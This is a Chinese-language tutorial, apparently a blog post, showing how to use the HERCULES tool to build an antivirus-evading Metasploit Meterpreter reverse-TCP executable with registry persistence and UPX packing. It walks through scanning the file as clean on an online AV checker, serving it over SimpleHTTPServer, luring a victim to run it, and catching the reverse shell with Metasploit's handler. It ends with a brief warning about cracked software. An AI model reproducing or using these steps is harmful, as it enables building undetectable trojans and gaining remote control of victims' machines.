如何用HERCULES繞過殺軟
HERCULES是一個由Go語言開發的可以繞過防病毒軟體的可定製的有效載荷生成器,只需簡單的設定,就可以生成用於Metasploit的免殺payload,經測試,可完美繞過當前主流防病毒軟體查殺檢測。
Let us learn how to use it !
測試環境:
kali linux 2.0 : 192.168.1.100
windows7 x64 : 192.168.1.140
測試流程:
1.下載配置go語言環境;
2.下載初始化HERCULES ;
3.生成免殺exp;
4.誘使受害者下載執行exp
5.Metasploit監聽並獲取許可權
(一)下載配置go語言環境:
在kali linux 攻擊機中安裝go 語言環境。
1.下載原始碼包:
wget -c https://storage.googleapis.com/golang/go1.8.3.linux-amd64.tar.gz2.解壓檔案至/usr/local
tar -C /usr/local -xzf go1.8.3.linux-amd64.tar.gz3.設定環境變數(讓命令go有效)
cd ~vim .profile在檔案未必追加:
export PATH=$PATH:/usr/local/go/bin儲存退出
使當前配置檔案生效
. .profile
4.測試:
go version(二)下載初始化HERCULES:
從github上下載HERCULES原始檔:
git clone https://github.com/noosec/HERCULES.git下載HERCULES相關的資原始檔
wget -c https://github.com/fatih/color初始化HERCULES
go get github.com/fatih/color
go run Setup.go
(三)生成免殺payload
1.選擇生成Payload:
運行當前目錄下HERCULES,選擇第一個選項:
2.選擇Tcp型別的 Meterpreter Payload
#WHAT IS UPX ?UPX(Ultimate Packer for Executables)是一款免費的開源可執行封裝程式,支援來自不同作業系統的多種檔案格式。 UPX簡單地將二進位制檔案壓縮,在執行時將二進位制打包(解壓縮)本身打包到記憶體中。
#WHAT IS "AV EVASION SCORE" ?AV Evasion Score是確定有效載荷反病毒繞過能力有效性的一個比例尺(1/10),1代表通過AV軟體的可能性很低。
使用特殊功能並用upx打包有效載荷可減少AV Evasion Score
選擇Tcp 型別的 Payload ,輸入 1,回車
3.進入payload引數設定介面:
輸入反彈回連的IP地址,埠號:
#Persistence:永續性功能將執行的二進位制檔案新增到windows啟動登錄檔(CurrentVersion / Run ) 以進行持續訪問。
#Migration:此函式觸發一個迴圈,嘗試遷移到遠端程序,直到成功遷移為止
以下設定可根據自已需要設定,這裡我選擇了使用永續性功能,增加了 by pass av 相關函式功能payload 並使用了 upx 加殼,生成了檔名為creak.exe的payload反彈exe程式。
經過以上設定,回車之後,會在當前使用者主目錄下生成相關免殺exe程式:
對於相關程式是否免殺,我們可以通過線上av查殺網站進行測試,通過35個查殺軟體掃描,全部掃描的結果為clean:
國內某殺軟體 :
(四)Win7下載生成的exe
在Kali Linux 中 exe檔案所在目錄執行,將當前目錄檔案共享:
python -m SimpleHTTPServerwin7 中使用瀏覽器訪問:http://192.168.1.100/creak.exe,下載檔案到本地。
(五)Metasploit監聽並獲取許可權
使用msf,載入以下兩個模組,設定相關引數,並等待連線:
exploit/multi/handler
windows/meterpreter/reverse_tcp
在win7上執行creak.exe,msf 成功收到反彈shell。
END :
在測試過程中,當執行生成的Payload之後,防毒軟體可能會基於行為分析,將生成的payload識別為木馬程式,當遇到這種情況後,只需使用HERCULES重新生成一次,就可 by pass this AV 了。
在國內,各種軟體下載網站,各種破解程式多不勝數,這些軟體都有一個共性,在執行的時候,建議關閉防毒軟體,亦或是建議先使用防毒軟體進行一次雲查殺,再告訴使用者,此軟體是乾淨、無毒的,建立關閉防毒軟體,再執行相關程式檔案,但結果可能是,你運行了一個木馬程式。